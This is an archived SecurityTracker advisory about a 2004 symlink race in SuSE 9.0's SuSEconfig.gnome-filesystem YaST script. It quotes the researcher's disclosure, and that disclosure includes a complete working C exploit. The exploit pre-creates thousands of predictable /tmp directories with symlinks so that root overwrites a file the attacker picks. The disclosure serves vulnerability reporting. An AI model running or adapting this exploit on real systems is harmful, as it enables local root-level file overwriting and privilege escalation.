SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   SuSEconfig.gnome-filesystem Vendors:   SuSE
SuSEconfig.gnome-filesystem Temporary File Symlink Flaw Lets Local Users Overwrite Files With Root Privileges
SecurityTracker Alert ID:  1008703
SecurityTracker URL:  http://securitytracker.com/id/1008703
CVE Reference:   CAN-2004-0064   (Links to External Site)
Updated:  Jan 20 2004
Original Entry Date:  Jan 13 2004
Impact:   Modification of system information, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the SuSEconfig.gnome-filesystem YaST configuration script. A local user can overwrite arbitrary files on the system.

l0om from excluded.org reported that the configuration script creates temporary files in an unsafe manner. A local user can create a symbolic link from a critical file on the system to a likely temporary file name (of the form '/tmp/tmp.SuSEconfig.gnome-filesystem.[RANDOM]'). Then, when a configuration change is made with the YaST tool, the script will be executed and the symlinked file will be overwritten with root privileges.

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can overwrite arbitrary files on the system with root privileges to gain root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.suse.com (Links to External Site)
Cause:   Access control error, State error
Underlying OS:   Linux (SuSE)

Message History:   None.


 Source Message Contents

Date:  13 Jan 2004 20:28:15 -0000
Subject:  SuSE linux 9.0 YaST config Skribt [exploit]




 Author: l0om <l0om@excluded.org>  
 Date: 12.01.2004 
 page: www.excluded.org  
 
 SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem  
  
 There is a symlink problem in the 
SuSEconfig.gnome-filesystem  
 scribt. a normal user can creat and overwrite every 
file  
 on the system. This script gets executed after a 
configuration change by the  
setup tool YaST. So if you have installed gnome or 
parts of gnome check this out. 
  
  
 When this scribt gets executed by YaST after a  
 configuration change it does the following:  
  
 TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM  
 mkdir $TEMP  
 touch $TEMP/list  
 [...]  
 echo >$TEMP/found  
 [...]  
  
 the env variable $RANDOM includes a random number. 
in my tests  
 this number goes up from 1 to 33000. But also if it 
goes up to  
 65535 it is still vul. to a symlink attack. this is 
nearly as  
 bad as the symlink problem which has been found on 
SuSE 8.2.  
 On 8.2 a SuSEconf scribt has created a link with the 
$$ at the  
 file end.  
  
 I have used a little exploit written in C which 
creats the  
 directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" 
up to  
 33000. in every directory i have created a symlink 
to a file  
 which i want to creat or to overwrite. as the 
filename i have  
 taken the $TEMP/found and let it point to some file. 
in my test i  
 have taken the /etc/nologin- and hey- it has worked!  
  
 have phun!  
  
  
*******************************************************************/  
  
 #include <stdio.h>  
 #include <unistd.h>  
 #include <string.h>  
  
 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."  
 #define START 1  
 #define END 33000  
  
 int main(int argc, char **argv)  
 {  
 int i;  
 char buf[150];  
  
 printf("\tSuSE 9.0 YaST script 
SuSEconfig.gnome-filesystem exploit\n");  
 printf("\t-------------------------------------------------------------
\n");  
 printf("\tdiscovered and written by l0om 
<l0om@excluded.org>\n");  
 printf("\t WWW.EXCLUDED.ORG\n\n");  
  
 if(argc != 2) {  
 printf("usage: %s <destination-file>\n",argv[0]);  
 exit(0xff);  
 }  
  
 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);  
 read(1, buf, 1); fflush(stdin);  
  
 umask(0000);  
 printf("working\n\n");  
 for(i = START; i < END; i++) {  
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);  
 if(mkdir(buf,00777) == -1) {  
 fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);  
 exit(0xff);  
 }  
 if(!(i%1000))printf(".");  
 strcat(buf, "/found");  
 if(symlink(argv[1], buf) == -1) {  
 fprintf(stderr, "cannot creat symlink from %s to %s 
[Nr.%d]\n",buf,argv[1],i);  
 exit(0xff);  
 }  
 }  
 printf("\ndone!\n");  
 printf("next time the SuSE.gnome-filesystem script 
gets executed\n");  
 printf("we will create or overwrite file %s
\n",argv[1]);  
 return(0x00);  
 }  /* i cant wait for the new gobbles comic!! */ 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC